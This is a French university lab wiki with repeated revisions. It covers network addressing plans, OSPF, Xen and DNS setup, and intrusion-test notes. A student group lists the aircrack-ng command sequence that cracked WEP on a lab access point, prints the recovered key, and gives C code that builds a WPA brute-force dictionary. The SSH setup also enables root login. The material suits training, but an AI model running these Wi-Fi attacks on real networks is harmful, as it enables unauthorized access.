| Groupe 12
| truffe.site
| Debian 10 Buster
| 312
| 193.48.57.177
| 100.64.0.17
|-
| Groupe 11
| stropharia.site
| Debian 10 Buster
| 311
| 193.48.57.178
| 100.64.0.18
|-
| Groupe 10
| pleurote.site
| Debian 10 Buster
| 310
| 193.48.57.179
| 100.64.0.19
|-
| Groupe 9
| calicedelamort.site
| Debian 10 Buster
| 309
| 193.48.57.180
| 100.64.0.20
|-
| Groupe 8
| piedbleu.site
| Debian 10 Buster
| 308
| 193.48.57.181
| 100.64.0.21
|-
| Groupe 7
| girolle.site
| Debian 10 Buster
| 307
| 193.48.57.182
| 100.64.0.22
|-
| Groupe 6
| morillon.website
| Debian 10 Buster
| 306
| 193.48.57.183
| 100.64.0.23
|-
| Groupe 5
| amanite.site
| Debian 10 Buster
| 305
| 193.48.57.184
| 100.64.0.24
|-
| Groupe 4
| tricholome.site
| Debian 10 Buster
| 304
| 193.48.57.185
| 100.64.0.25
|-
| Groupe 3
| clavaire.site
| Debian 10 Buster
| 303
| 193.48.57.186
| 100.64.0.26
| Port ssh : 2222
|-
| Groupe 2
| ophiocordyceps.site
| Debian 10 Buster
| 302
| 193.48.57.187
| 100.64.0.27
|-
| Groupe 1
| trompettedelamort.site
| Debian 10 Buster
| 301
| 193.48.57.188
| 100.64.0.28
|}

{| class="wikitable"
! Groupe !! Domaine !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6 !! N° VRRP
|-
|
|
| 1
| 10.60.100.0/24
| 10.60.100.1
| 10.60.100.2
| 10.60.100.254
| 2001:660:4401:60b0::0/64
| 31
|-
|
|
| 131
| 192.168.222.8/29
| 192.168.222.12
| 192.168.222.13
|
| 2001:660:4401:60b1::0/64
|
|-
|
|
| 531
| 192.168.222.24/29
| 192.168.222.26
| 192.168.222.27
|
|
|
|-
|
|
| 333
| 100.64.0.0/24
| 100.64.0.1
| 100.64.0.2
| 100.64.0.254
| 2001:660:4401:60b2::0/64
| 33
|-
| Groupe 1
| trompettedelamort.site
| 301
| 10.60.101.0/24
| 10.60.101.1
| 10.60.101.2
| 10.60.101.254
| 2001:660:4401:60b3::0/64
| 41
|-
| Groupe 2
| ophiocordyceps.site
| 302
| 10.60.102.0/24
| 10.60.102.1
| 10.60.102.2
| 10.60.102.254
| 2001:660:4401:60b4::0/64
| 42
|-
| Groupe 3
| clavaire.site
| 303
| 10.60.103.0/24
| 10.60.103.1
| 10.60.103.2
| 10.60.103.254
| 2001:660:4401:60b5::0/64
| 43
|-
| Groupe 4
| tricholome.site
| 304
| 10.60.104.0/24
| 10.60.104.1
| 10.60.104.2
| 10.60.104.254
| 2001:660:4401:60b6::0/64
| 44
|-
| Groupe 5
| amanite.site
| 305
| 10.60.105.0/24
| 10.60.105.1
| 10.60.105.2
| 10.60.105.254
| 2001:660:4401:60b7::0/64
| 45
|-
| Groupe 6
| morillon.website
| 306
| 10.60.106.0/24
| 10.60.106.1
| 10.60.106.2
| 10.60.106.254
| 2001:660:4401:60b8::0/64
| 46
|-
| Groupe 7
| girolle.site
| 307
| 10.60.107.0/24
| 10.60.107.1
| 10.60.107.2
| 10.60.107.254
| 2001:660:4401:60b9::0/64
| 47
|-
| Groupe 8
| piedbleu.site
| 308
| 10.60.108.0/24
| 10.60.108.1
| 10.60.108.2
| 10.60.108.254
| 2001:660:4401:60ba::0/64
| 48
|-
| Groupe 9
| calicedelamort.site
| 309
| 10.60.109.0/24
| 10.60.109.1
| 10.60.109.2
| 10.60.109.254
| 2001:660:4401:60bb::0/64
| 49
|-
| Groupe 10
| pleurote.site
| 310
| 10.60.110.0/24
| 10.60.110.1
| 10.60.110.2
| 10.60.110.254
| 2001:660:4401:60bc::0/64
| 50
|-
| Groupe 11
| stropharia.site
| 311
| 10.60.111.0/24
| 10.60.111.1
| 10.60.111.2
| 10.60.111.254
| 2001:660:4401:60bd::0/64
| 51
|-
| Groupe 12
| truffe.site
| 312
| 10.60.112.0/24
| 10.60.112.1
| 10.60.112.2
| 10.60.112.254
| 2001:660:4401:60be::0/64
| 52
|-
| Groupe 14
| oronge.site
| 314
| 10.60.114.0/24
| 10.60.114.1
| 10.60.114.2
| 10.60.114.254
| 2001:660:4401:60bf::0/64
| 54
|}

== Installation du réseau ==

=== Branchement du matériel ===

[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]

=== Connexions entre équipements ===

{| class="wikitable"
! !! Type !! Port
|-
| 6509-E
| Fibre 10G
| Te5/4
|-
| 9200
| Fibre 10G
| Te1/1/1
|}
{| class="wikitable"
! !! Type !! Port
|-
| 6509-E
| Fibre 10G
| Te6/5
|-
| ISR 4331
| Fibre 10G
| AAA
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 6509-E
| Fibre 10G
| Te5/5
| 333
| 100.64.0.1/24
|-
| CAPBRETON
| Fibre 10G
| Eth5
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 6509-E
| Fibre 10G
| Te6/4
| 131
| 192.168.222.12/29
|-
| ECOLE
| Fibre 10G
| N/A
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 9200
| Fibre 1G
| Te1/1/3
| 333
| 100.64.0.2/24
|-
| CAPBRETON
| Cuivre
| Eth4
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port
|-
| 9200
| Cuivre
| Te5/4
|-
| ISR 4331
| Cuivre
| AAA
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 9200
| Fibre 10G
| Gi1/0/1
| 131
| 192.168.222.13/29
|-
| ECOLE
| Fibre 10G
| N/A
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| ISR 4331
| Cuivre
| Gi1/0/2
| XXX
| YYY.YYY.YYY.YYY
|-
| SDSL
| Cuivre
| N/A
| N/A
| N/A
|}

=== Paramétrage de l'OSPF ===

'''6509-E'''

router ospf 1 # un numéro de processus
router-id 10.60.100.1 # un id pour le routeur (plus petite adresse disponible)
log-adjacency-changes
summary-address 193.48.57.176 255.255.255.240 # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)
summary-address 100.64.0.0 255.240.0.0 not-advertise # address q'on veut pas diffuser (celle du reseau privé)
summary-address 10.0.0.0 255.0.0.0 not-advertise # address q'on veut pas diffuser (?)
redistribute connected subnets # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés
redistribute static subnets route-map ospf
network 192.168.222.8 0.0.0.7 area 2 # domaine de diffusion OSPF

'''9200'''

router ospf 1
router-id 10.60.100.2 # on change simplement l'id du routeur par rapport au 6509-E
log-adjacency-changes
summary-address 193.48.57.176 255.255.255.240
summary-address 100.64.0.0 255.240.0.0 not-advertise
summary-address 10.0.0.0 255.0.0.0 not-advertise
redistribute connected subnets
redistribute static subnets route-map ospf
network 192.168.222.8 0.0.0.7 area 2

TP sysres IMA5sc 2020/2021 G3

2020-11-16T15:28:02Z

Tmertz : /* DNS */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.178/28
URL : clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

//rename disque et formatage (lvrename/mkfs)

//modif .cfg pour ajouter disques

//transfert fichier /var vers nouvelle partition

//ajoute au /etc/fstab les disques

//mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
8 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
@ IN NS ns6.gandi.net.
@ IN MX 100 clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186

- relancer bind :
service bind9 restart

- pour vérifier :
host -tany clavaire.site

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===
=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

== Site Web ==

Achat de clavaire.site[http://clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

TP sysres IMA5sc 2020/2021 G3

2020-11-16T15:13:15Z

Tmertz : /* DNS */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.178/28
URL : clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

//rename disque et formatage (lvrename/mkfs)

//modif .cfg pour ajouter disques

//transfert fichier /var vers nouvelle partition

//ajoute au /etc/fstab les disques

//mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
8 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
@ IN NS ns6.gandi.net.
@ IN MX 100 clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186

- relancer bind :
service bind9 restart

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===
=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

== Site Web ==

Achat de clavaire.site[http://clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

TP sysres IMA5sc 2020/2021

2020-11-16T14:50:46Z

Tmertz : /* Plan d'adressage */

== Répartition des binômes ==

{| class="wikitable"
! Cahier !! Elèves
|-
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]
| GURY Evan & DUBOIS Vincent
|-
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]
| BARGIBANT Quentin & LAGNEAU Alex
|-
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]
| SIMONIN Richard & MERTZ Thomas
|-
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]
| BENAYED Samuel & EVRARD Théo
|-
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]
| RINGOT Loïc & SANCHEZ Pierre
|-
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]
| NDUWAMUNGU Jean De Dieu & MOINAT Théau
|-
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]
| EKHLAS EID Nour & BISALLI Clara
|-
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]
| SOULAIMANI Jawad & TEKIN Kadir
|-
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]
| VIEUBLED Tanguy & VERNIER Paul
|-
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]
| MALTI Hind & AHOUASSOU Loris
|-
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]
| DARDENNE Sébastien & CALLERISA Corto
|-
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]
| NORMAND Quentin & CLAUDEL Maxime
|-
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]
| FAUCHOIS Lukas & ROUILLÉ Guillaume
|}

==A faire==

Chaque binôme peut :
* '''Compléter les tableaux du plan d'adressage'''
* Ajouter ses routes sur les 2 routeurs
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV4 (adresse + vrrp)
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV6 (adresse)

Vous pouvez vous renseigner sur notre wiki.<br/>
Faites surtout très attention à ne pas effacer les modifications des autres groupes ainsi que les modifications communes déjà effectuées !

'''Il n'y a rien à modifier sur les vlan 1, 131, 301, 314 et 333 !'''<br/>
'''Il n'y a rien à faire au niveau du rip'''

Si vous avez le moindre doute, '''demandez-nous''' !

Cordialement,

Le groupe 14

==Plan d'adressage==

{| class="wikitable"
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (publique) !! IP (privée)
|-
| Groupe 14
| oronge.site
| Debian 10 Buster
| 314
| 193.48.57.176
| 100.64.0.16
|-
| Groupe 12
| truffe.site
| Debian 10 Buster
| 312
| 193.48.57.177
| 100.64.0.17
|-
| Groupe 11
| stropharia.site
| Debian 10 Buster
| 311
| 193.48.57.178
| 100.64.0.18
|-
| Groupe 10
| pleurote.site
|
| 310
| 193.48.57.179
| 100.64.0.19
|-
| Groupe 9
|
|
| 309
| 193.48.57.180
| 100.64.0.20
|-
| Groupe 8
| piedbleu.site
|
| 308
| 193.48.57.181
| 100.64.0.21
|-
| Groupe 7
|
|
| 307
| 193.48.57.182
| 100.64.0.22
|-
| Groupe 6
| morillon.website
| Debian 10 Buster
| 306
| 193.48.57.183
| 100.64.0.23
|-
| Groupe 5
| amanite.site
| Debian 10 Buster
| 305
| 193.48.57.184
| 100.64.0.24
|-
| Groupe 4
|
|
| 304
| 193.48.57.185
| 100.64.0.25
|-
| Groupe 3
| clavaire.site
| Debian 10 Buster
| 303
| 193.48.57.186
| 100.64.0.26
|-
| Groupe 2
| ophiocordyceps.site
| Debian 10 Buster
| 302
| 193.48.57.187
| 100.64.0.27
|-
| Groupe 1
| trompettedelamort.site
| Debian 10 Buster
| 301
| 193.48.57.188
| 100.64.0.28
|}

{| class="wikitable"
! Groupe !! Domaine !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6 !! N° VRRP
|-
|
|
| 1
| 10.60.100.0/24
| 10.60.100.1
| 10.60.100.2
| 10.60.100.254
| 2001:660:4401:60b0::0/64
| 31
|-
|
|
| 131
| 192.168.222.8/29
| 192.168.222.12
| 192.168.222.13
|
| 2001:660:4401:60b1::0/64
|
|-
|
|
| 333
| 100.64.0.0/24
| 100.64.0.1
| 100.64.0.2
| 100.64.0.254
| 2001:660:4401:60b2::0/64
| 33
|-
| Groupe 1
| trompettedelamort.site
| 301
| 10.60.101.0/24
| 10.60.101.1
| 10.60.101.2
| 10.60.101.254
| 2001:660:4401:60b3::0/64
| 41
|-
| Groupe 2
|
| 302
| 10.60.102.0/24
| 10.60.102.1
| 10.60.102.2
| 10.60.102.254
| 2001:660:4401:60b4::0/64
| 42
|-
| Groupe 3
| clavaire.site
| 303
| 10.60.103.0/24
| 10.60.103.1
| 10.60.103.2
| 10.60.103.254
| 2001:660:4401:60b5::0/64
| 43
|-
| Groupe 4
|
| 304
| 10.60.104.0/24
| 10.60.104.1
| 10.60.104.2
| 10.60.104.254
| 2001:660:4401:60b6::0/64
| 44
|-
| Groupe 5
| amanite.site
| 305
| 10.60.105.0/24
| 10.60.105.1
| 10.60.105.2
| 10.60.105.254
| 2001:660:4401:60b7::0/64
| 45
|-
| Groupe 6
| morillon.website
| 306
| 10.60.106.0/24
| 10.60.106.1
| 10.60.106.2
| 10.60.106.254
| 2001:660:4401:60b8::0/64
| 46
|-
| Groupe 7
|
| 307
| 10.60.107.0/24
| 10.60.107.1
| 10.60.107.2
| 10.60.107.254
| 2001:660:4401:60b9::0/64
| 47
|-
| Groupe 8
|
| 308
| 10.60.108.0/24
| 10.60.108.1
| 10.60.108.2
| 10.60.108.254
| 2001:660:4401:60ba::0/64
| 48
|-
| Groupe 9
|
| 309
| 10.60.109.0/24
| 10.60.109.1
| 10.60.109.2
| 10.60.109.254
| 2001:660:4401:60bb::0/64
| 49
|-
| Groupe 10
| pleurote.site
| 310
| 10.60.110.0/24
| 10.60.110.1
| 10.60.110.2
| 10.60.110.254
| 2001:660:4401:60bc::0/64
| 50
|-
| Groupe 11
| stropharia.site
| 311
| 10.60.111.0/24
| 10.60.111.1
| 10.60.111.2
| 10.60.111.254
| 2001:660:4401:60bd::0/64
| 51
|-
| Groupe 12
| truffe.site
| 312
| 10.60.112.0/24
| 10.60.112.1
| 10.60.112.2
| 10.60.112.254
| 2001:660:4401:60be::0/64
| 52
|-
| Groupe 14
| oronge.site
| 314
| 10.60.114.0/24
| 10.60.114.1
| 10.60.114.2
| 10.60.114.254
| 2001:660:4401:60bf::0/64
| 54
|}

== Installation du réseau ==

=== Branchement du matériel ===

[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]

=== Connexions entre équipements ===

{| class="wikitable"
! !! Type !! Port
|-
| 6509-E
| Fibre 10G
| Te5/4
|-
| 9200
| Fibre 10G
| Te1/1/1
|}
{| class="wikitable"
! !! Type !! Port
|-
| 6509-E
| Fibre 10G
| Te6/5
|-
| ISR 4331
| Fibre 10G
| AAA
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 6509-E
| Fibre 10G
| Te5/5
| 333
| 100.64.0.1/24
|-
| CAPBRETON
| Fibre 10G
| Eth5
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 6509-E
| Fibre 10G
| Te6/4
| 131
| 192.168.222.12/29
|-
| ECOLE
| Fibre 10G
| N/A
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 9200
| Fibre 1G
| Te1/1/3
| 333
| 100.64.0.2/24
|-
| CAPBRETON
| Cuivre
| Eth4
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port
|-
| 9200
| Cuivre
| Te5/4
|-
| ISR 4331
| Cuivre
| AAA
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 9200
| Fibre 10G
| Gi1/0/1
| 131
| 192.168.222.13/29
|-
| ECOLE
| Fibre 10G
| N/A
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| ISR 4331
| Cuivre
| Gi1/0/2
| XXX
| YYY.YYY.YYY.YYY
|-
| SDSL
| Cuivre
| N/A
| N/A
| N/A
|}

=== Paramétrage de l'OSPF ===

'''6509-E'''

router ospf 1 # un numéro de processus
router-id 10.60.100.1 # un id pour le routeur (plus petite adresse disponible)
log-adjacency-changes
summary-address 193.48.57.176 255.255.255.240 # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)
summary-address 100.64.0.0 255.240.0.0 not-advertise # address q'on veut pas diffuser (celle du reseau privé)
summary-address 10.0.0.0 255.0.0.0 not-advertise # address q'on veut pas diffuser (?)
redistribute connected subnets # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés
redistribute static subnets route-map ospf
network 192.168.222.8 0.0.0.7 area 2 # domaine de diffusion OSPF

'''9200'''

router ospf 1
router-id 10.60.100.2 # on change simplement l'id du routeur par rapport au 6509-E
log-adjacency-changes
summary-address 193.48.57.176 255.255.255.240
summary-address 100.64.0.0 255.240.0.0 not-advertise
summary-address 10.0.0.0 255.0.0.0 not-advertise
redistribute connected subnets
redistribute static subnets route-map ospf
network 192.168.222.8 0.0.0.7 area 2

TP sysres IMA5sc 2020/2021 G3

2020-11-16T14:48:28Z

Tmertz : /* Routage du site IPv4 */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.178/28
URL : clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

//rename disque et formatage (lvrename/mkfs)

//modif .cfg pour ajouter disques

//transfert fichier /var vers nouvelle partition

//ajoute au /etc/fstab les disques

//mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186

- relancer bind :
service bind9 restart

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

